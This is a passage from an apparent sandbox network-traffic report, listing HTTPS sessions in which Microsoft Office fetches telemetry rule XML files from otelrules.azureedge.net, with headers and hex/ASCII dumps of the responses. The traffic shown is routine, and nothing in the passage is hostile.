                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:18 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1403
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                          x-ms-request-id: 90d87084-c01e-000b-0215-3de255000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164518Z-178bfbc474bpscmfhC1NYCfc2c00000003d0000000001z54
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:18 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          127192.168.2.54989413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:18 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:18 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1362
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDF497570"
                                                                                                                                                                                          x-ms-request-id: 650b08ff-201e-0033-5b2f-3cb167000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164518Z-178bfbc474bh5zbqhC1NYCkdug00000004rg0000000030fu
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:18 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          128192.168.2.54989613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:18 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:18 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1366
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                          ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                          x-ms-request-id: 7b3b97af-701e-003e-795c-3d79b3000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164518Z-178bfbc474bscnbchC1NYCe7eg00000004z00000000027dg
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:18 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          129192.168.2.54989713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:18 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:18 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1399
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                          x-ms-request-id: 734d7ed2-001e-002b-08e4-3c99f2000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164518Z-178bfbc474bv587zhC1NYCny5w00000004h000000000gx97
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:18 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          130192.168.2.54989813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:18 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:18 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1362
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                          ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                          x-ms-request-id: 39e7be55-101e-008d-7d03-3d92e5000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164518Z-178bfbc474bnwsh4hC1NYC2ubs00000004x0000000000wm3
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:18 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          131192.168.2.54989913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:20 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:20 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1403
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                          ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                          x-ms-request-id: e8d3758b-d01e-0066-2757-3cea17000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164520Z-15b8b599d886w4hzhC1TEBb4ug000000037000000000cve8
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:20 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          132192.168.2.54990013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:20 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:20 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1366
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                          x-ms-request-id: cb244ee5-a01e-003d-2a49-3c98d7000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164520Z-15b8b599d882l6clhC1TEBxd5c000000036g000000001a6e
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:20 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          133192.168.2.54990113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:20 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:20 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1399
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE976026E"
                                                                                                                                                                                          x-ms-request-id: 0b679675-f01e-005d-336b-3b13ba000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164520Z-178bfbc474bwh9gmhC1NYCy3rs00000004t000000000c8hp
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:20 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          134192.168.2.54990213.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:20 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:20 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1362
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                          x-ms-request-id: 270c2d5d-601e-00ab-2f8c-3a66f4000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164520Z-174c587ffdfgcs66hC1TEB69cs000000031g00000000chv8
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:20 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          135192.168.2.54990313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:20 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:21 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1425
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                          x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164521Z-174c587ffdfmlsmvhC1TEBvyks00000003dg0000000043nx
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
